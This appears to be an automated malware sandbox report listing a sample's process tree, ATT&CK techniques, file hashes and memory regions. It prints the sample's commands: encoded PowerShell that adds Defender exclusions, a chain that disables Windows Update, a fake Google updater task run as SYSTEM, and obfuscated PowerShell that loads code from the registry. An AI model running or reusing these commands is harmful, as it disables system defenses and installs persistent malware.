C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{18fbb428-ed97-45f1-b87b-eeaa4ed7a1ea}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:184868

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ab195996-c2ea-4ad6-bb6c-a08a17a144d0}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:184908

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAaABnAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABkAHkAIwA+AA=="
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1348

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:268

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1916

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:764

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1824

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:960

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1908

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:388

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:1652

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies security service
- Modifies registry key
PID:1176

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:1104

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:2008

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1492

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1928

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1404

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1444

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1844

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:1700

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:316

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:1608

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:1712

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:1372

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:1332

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1436

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AHQAZQBtAHAAIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AGUAbQBwAC4AZQB4AGUAJwApACAAPAAjAHEAaQBpACMAPgA="
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Users\Admin\AppData\Local\Temp\temp.exe
"C:\Users\Admin\AppData\Local\Temp\temp.exe"
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Users\Admin\AppData\Local\Temp\cmd.exe
"C:\Users\Admin\AppData\Local\Temp\cmd.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1564

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:184688

C:\Users\Admin\AppData\Local\Temp\Starter.exe
"C:\Users\Admin\AppData\Local\Temp\Starter.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:184776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 183036
5⤵
- Loads dropped DLL
- Program crash
PID:184760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 5 & Del "temp.exe"
4⤵
PID:184716

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 5
5⤵
PID:184800

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
- Drops file in Windows directory
PID:1768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
2⤵
PID:288

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
3⤵
- Creates scheduled task(s)
PID:1364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
2⤵
PID:1608

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
PID:1372

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

C:\Windows\system32\taskeng.exe
taskeng.exe {A26A112D-A166-4400-81F2-091C4D43CE2F} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
60KB

MD5
6c6a24456559f305308cb1fb6c5486b3

SHA1
3273ac27d78572f16c3316732b9756ebc22cb6ed

SHA256
efc3c579bd619ceab040c4b8c1b821b2d82c64fddd9e80a00ec0d7f6577ed973

SHA512
587d4a9175a6aa82cd8bb1c11ca6508f95cd218f76ac322ddbd1bc7146a0e25f8937ee426a6fb0fb0bb045cedb24d8c8a9edfe9f654112f293d8701220f726b4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7ed54ba63281e7f115078fc965e7d26b

SHA1
dce307332dd62afd375f1ebd13b41bceb370cc1b

SHA256
7d9fa90c6a884034bbec99d4753ad9324ef922d5aa837b068bb4d69e21c76bac

SHA512
9a438a97a8e2cdd0b4b485e2b86cce0bb7f79c578155d5fc2ee2a2e579500039d5d5950d0901e6c8117a6d25a2200d49943a81ae389ddd45caf8a0a06e85f31a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Starter.exe

Filesize
18KB

MD5
f67f9188455a685c402e44748a9f47b1

SHA1
0ed55d3d1227ff4048672ed93df3ad6e096f8031

SHA256
f192fa45cf887a5cdfb904df31238c3201879e8c0a0764f18efad1ce3b6ed713

SHA512
7b8e7faaba35f25ea9fc85845002d5dbeea5380b54a1c65c8462e6f2ea64ac45290926072acaf89a754c3fe8fe5e013bc7e0a08b8c6adce1d5c626e199e6913b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Starter.exe

Filesize
18KB

MD5
f67f9188455a685c402e44748a9f47b1

SHA1
0ed55d3d1227ff4048672ed93df3ad6e096f8031

SHA256
f192fa45cf887a5cdfb904df31238c3201879e8c0a0764f18efad1ce3b6ed713

SHA512
7b8e7faaba35f25ea9fc85845002d5dbeea5380b54a1c65c8462e6f2ea64ac45290926072acaf89a754c3fe8fe5e013bc7e0a08b8c6adce1d5c626e199e6913b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cmd.exe

Filesize
351KB

MD5
2c4214d0aa9bfd57e2669e99f8b72af6

SHA1
d84c9cedff9ad408436a7765c5af5cabe1d0a5c9

SHA256
c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1

SHA512
1baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.exe

Filesize
7KB

MD5
f321da5881a6aaeb53da13d5c075406b

SHA1
979ed66205d2bad63fc016dc8c32cff6a2b6fc05

SHA256
a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c

SHA512
c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.exe

Filesize
7KB

MD5
f321da5881a6aaeb53da13d5c075406b

SHA1
979ed66205d2bad63fc016dc8c32cff6a2b6fc05

SHA256
a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c

SHA512
c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a15da32c20b74db6c2d90cb0ddbbf7bb

SHA1
a605a63ce5c51b796f77f0fd7aacf12c93f50bff

SHA256
3a473abf0fc3a0d3a984527577e5c05f7c4d738ad772664afe44840c38e2cde9

SHA512
180c6ebe52b18caf90e9211a6a7ca43ecd511027941a9c0fce181e0a6d9fabb5e27adffd9ebe7d898e126b0fb9acc312ecb6f14bc625c2415daabbb3bf642037

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\Starter.exe

Filesize
18KB

MD5
f67f9188455a685c402e44748a9f47b1

SHA1
0ed55d3d1227ff4048672ed93df3ad6e096f8031

SHA256
f192fa45cf887a5cdfb904df31238c3201879e8c0a0764f18efad1ce3b6ed713

SHA512
7b8e7faaba35f25ea9fc85845002d5dbeea5380b54a1c65c8462e6f2ea64ac45290926072acaf89a754c3fe8fe5e013bc7e0a08b8c6adce1d5c626e199e6913b

Download Submit
\Users\Admin\AppData\Local\Temp\cmd.exe

Filesize
351KB

MD5
2c4214d0aa9bfd57e2669e99f8b72af6

SHA1
d84c9cedff9ad408436a7765c5af5cabe1d0a5c9

SHA256
c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1

SHA512
1baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d

Download Submit
\Users\Admin\AppData\Local\Temp\cmd.exe

Filesize
351KB

MD5
2c4214d0aa9bfd57e2669e99f8b72af6

SHA1
d84c9cedff9ad408436a7765c5af5cabe1d0a5c9

SHA256
c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1

SHA512
1baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d

Download Submit
\Users\Admin\AppData\Local\Temp\cmd.exe

Filesize
351KB

MD5
2c4214d0aa9bfd57e2669e99f8b72af6

SHA1
d84c9cedff9ad408436a7765c5af5cabe1d0a5c9

SHA256
c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1

SHA512
1baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d

Download Submit
memory/268-65-0x0000000000000000-mapping.dmp

Download
memory/288-125-0x0000000000000000-mapping.dmp

Download
memory/316-88-0x0000000000000000-mapping.dmp

Download
memory/388-74-0x0000000000000000-mapping.dmp

Download
memory/416-222-0x0000000000360000-0x000000000038A000-memory.dmp

Filesize
168KB

Download
memory/416-193-0x0000000000330000-0x0000000000353000-memory.dmp

Filesize
140KB

Download
memory/416-217-0x0000000000330000-0x0000000000353000-memory.dmp

Filesize
140KB

Download
memory/416-200-0x000007FEBDE90000-0x000007FEBDEA0000-memory.dmp

Filesize
64KB

Download
memory/416-231-0x00000000379B0000-0x00000000379C0000-memory.dmp

Filesize
64KB

Download
memory/460-227-0x00000000379B0000-0x00000000379C0000-memory.dmp

Filesize
64KB

Download
memory/460-223-0x0000000000140000-0x000000000016A000-memory.dmp

Filesize
168KB

Download
memory/476-228-0x0000000000160000-0x000000000018A000-memory.dmp

Filesize
168KB

Download
memory/476-232-0x00000000379B0000-0x00000000379C0000-memory.dmp

Filesize
64KB

Download
memory/484-229-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/592-230-0x00000000005A0000-0x00000000005CA000-memory.dmp

Filesize
168KB

Download
memory/764-69-0x0000000000000000-mapping.dmp

Download
memory/828-75-0x0000000000000000-mapping.dmp

Download
memory/924-93-0x0000000000000000-mapping.dmp

Download
memory/956-144-0x00000000027DB000-0x00000000027FA000-memory.dmp

Filesize
124KB

Download
memory/956-101-0x000007FEEDDB0000-0x000007FEEE7D3000-memory.dmp

Filesize
10.1MB

Download
memory/956-116-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/956-124-0x00000000027DB000-0x00000000027FA000-memory.dmp

Filesize
124KB

Download
memory/956-104-0x000007FEED250000-0x000007FEEDDAD000-memory.dmp

Filesize
11.4MB

Download
memory/956-122-0x00000000027D4000-0x00000000027D7000-memory.dmp

Filesize
12KB

Download
memory/956-94-0x0000000000000000-mapping.dmp

Download
memory/960-71-0x0000000000000000-mapping.dmp

Download
memory/1104-79-0x0000000000000000-mapping.dmp

Download
memory/1176-77-0x0000000000000000-mapping.dmp

Download
memory/1184-78-0x0000000000000000-mapping.dmp

Download
memory/1332-92-0x0000000000000000-mapping.dmp

Download
memory/1348-63-0x0000000002674000-0x0000000002677000-memory.dmp

Filesize
12KB

Download
memory/1348-60-0x000007FEEDBF0000-0x000007FEEE74D000-memory.dmp

Filesize
11.4MB

Download
memory/1348-57-0x0000000000000000-mapping.dmp

Download
memory/1348-59-0x000007FEEE750000-0x000007FEEF173000-memory.dmp

Filesize
10.1MB

Download
memory/1348-64-0x000000000267B000-0x000000000269A000-memory.dmp

Filesize
124KB

Download
memory/1348-61-0x000000001B810000-0x000000001BB0F000-memory.dmp

Filesize
3.0MB

Download
memory/1348-62-0x0000000002674000-0x0000000002677000-memory.dmp

Filesize
12KB

Download
memory/1364-126-0x0000000000000000-mapping.dmp

Download
memory/1372-128-0x0000000000000000-mapping.dmp

Download
memory/1372-91-0x0000000000000000-mapping.dmp

Download
memory/1404-84-0x0000000000000000-mapping.dmp

Download
memory/1436-66-0x0000000000000000-mapping.dmp

Download
memory/1444-85-0x0000000000000000-mapping.dmp

Download
memory/1492-82-0x0000000000000000-mapping.dmp

Download
memory/1496-81-0x0000000000000000-mapping.dmp

Download
memory/1512-181-0x0000000077970000-0x0000000077B19000-memory.dmp

Filesize
1.7MB

Download
memory/1512-133-0x0000000000000000-mapping.dmp

Download
memory/1512-146-0x0000000077970000-0x0000000077B19000-memory.dmp

Filesize
1.7MB

Download
memory/1512-175-0x0000000001114000-0x0000000001117000-memory.dmp

Filesize
12KB

Download
memory/1512-141-0x0000000077970000-0x0000000077B19000-memory.dmp

Filesize
1.7MB

Download
memory/1512-139-0x000000000111B000-0x000000000113A000-memory.dmp

Filesize
124KB

Download
memory/1512-156-0x0000000077850000-0x000000007796F000-memory.dmp

Filesize
1.1MB

Download
memory/1512-138-0x0000000001114000-0x0000000001117000-memory.dmp

Filesize
12KB

Download
memory/1512-185-0x0000000077850000-0x000000007796F000-memory.dmp

Filesize
1.1MB

Download
memory/1512-178-0x000000000111B000-0x000000000113A000-memory.dmp

Filesize
124KB

Download
memory/1512-137-0x000007FEEC8B0000-0x000007FEED40D000-memory.dmp

Filesize
11.4MB

Download
memory/1512-136-0x000007FEED410000-0x000007FEEDE33000-memory.dmp

Filesize
10.1MB

Download
memory/1556-204-0x0000000077B50000-0x0000000077CD0000-memory.dmp

Filesize
1.5MB

Download
memory/1556-135-0x0000000000000000-mapping.dmp

Download
memory/1556-177-0x00000000744F0000-0x0000000074A9B000-memory.dmp

Filesize
5.7MB

Download
memory/1556-140-0x00000000763F1000-0x00000000763F3000-memory.dmp

Filesize
8KB

Download
memory/1556-163-0x00000000744F0000-0x0000000074A9B000-memory.dmp

Filesize
5.7MB

Download
memory/1556-68-0x0000000000000000-mapping.dmp

Download
memory/1564-131-0x0000000000000000-mapping.dmp

Download
memory/1564-176-0x0000000000080000-0x000000000009B000-memory.dmp

Filesize
108KB

Download
memory/1608-127-0x0000000000000000-mapping.dmp

Download
memory/1608-89-0x0000000000000000-mapping.dmp

Download
memory/1652-76-0x0000000000000000-mapping.dmp

Download
memory/1700-87-0x0000000000000000-mapping.dmp

Download
memory/1712-90-0x0000000000000000-mapping.dmp

Download
memory/1736-72-0x0000000000000000-mapping.dmp

Download
memory/1768-109-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1768-129-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1768-111-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1768-112-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1768-113-0x0000000140001844-mapping.dmp

Download
memory/1768-97-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1768-106-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1768-115-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1768-103-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1768-100-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1768-107-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1768-108-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1768-123-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1816-119-0x0000000000000000-mapping.dmp

Download
memory/1816-121-0x0000000000230000-0x0000000000238000-memory.dmp

Filesize
32KB

Download
memory/1824-70-0x0000000000000000-mapping.dmp

Download
memory/1844-86-0x0000000000000000-mapping.dmp

Download
memory/1896-55-0x000000001BDD0000-0x000000001C068000-memory.dmp

Filesize
2.6MB

Download
memory/1896-56-0x000007FEFC1F1000-0x000007FEFC1F3000-memory.dmp

Filesize
8KB

Download
memory/1896-54-0x000000013F450000-0x000000013F74A000-memory.dmp

Filesize
3.0MB

Download
memory/1896-96-0x0000000002410000-0x0000000002416000-memory.dmp

Filesize
24KB

Download
memory/1908-73-0x0000000000000000-mapping.dmp

Download
memory/1916-67-0x0000000000000000-mapping.dmp

Download
memory/1928-83-0x0000000000000000-mapping.dmp

Download
memory/2008-80-0x0000000000000000-mapping.dmp

Download
memory/184688-191-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/184688-157-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/184688-149-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/184688-154-0x000000000041A7DE-mapping.dmp

Download
memory/184688-158-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/184688-194-0x000000006F0C0000-0x000000006F0D0000-memory.dmp

Filesize
64KB

Download
memory/184688-145-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/184688-211-0x00000000003C0000-0x00000000003E1000-memory.dmp

Filesize
132KB

Download
memory/184688-201-0x00000000003A0000-0x00000000003BB000-memory.dmp

Filesize
108KB

Download
memory/184716-148-0x0000000000000000-mapping.dmp

Download
memory/184760-216-0x0000000001EA0000-0x0000000001EC1000-memory.dmp

Filesize
132KB

Download
memory/184760-155-0x0000000000000000-mapping.dmp

Download
memory/184760-196-0x000000006FB50000-0x000000006FB60000-memory.dmp

Filesize
64KB

Download
memory/184776-250-0x00000000005E0000-0x0000000000601000-memory.dmp

Filesize
132KB

Download
